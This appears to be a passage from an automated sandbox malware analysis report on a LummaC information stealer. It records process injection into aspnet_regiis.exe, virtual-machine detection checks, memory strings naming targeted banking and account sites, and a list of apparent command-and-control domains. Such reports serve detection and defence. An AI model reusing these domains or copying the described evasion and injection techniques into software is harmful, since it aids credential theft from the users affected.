Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: msvcp110.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: msvcp110.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C4A1D6 push eax; ret	5_3_02C4A20D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C4A1D6 push eax; ret	5_3_02C4A20D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43B25 pushfd ; ret	5_3_02C43B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C44F2F push edi; ret	5_3_02C44F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C3CCC2 push edi; ret	5_3_02C3CDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C429EB push edi; ret	5_3_02C429EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43DA3 push edx; ret	5_3_02C43DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43DA3 push edx; ret	5_3_02C43DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43DA3 push edx; ret	5_3_02C43DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43DA3 push edx; ret	5_3_02C43DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 5_3_02C43DA3 push edx; ret	5_3_02C43DB2

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	System information queried: FirmwareTableInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_3_0289C6B5 sldt word ptr [eax+0289C658h]

7_3_0289C6B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 5408	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7160	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1440	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior

Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ-
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.000000000280C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002839000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: aspnet_regiis.exe, 00000009.00000003.2115744139.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75AB0F10 LdrInitializeThunk,

7_2_75AB0F10

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: offybirhtdi.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: activedomest.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: arenbootk.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: mediavelk.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: definitib.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: elaboretib.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: strikebripm.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: ostracizez.sbs
Source: aspnet_regiis.exe, 00000005.00000002.2179719236.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: withdrwblon.cyou

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A70000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75A71000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB6000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AB9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 75AC9000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 5C4008	Jump to behavior
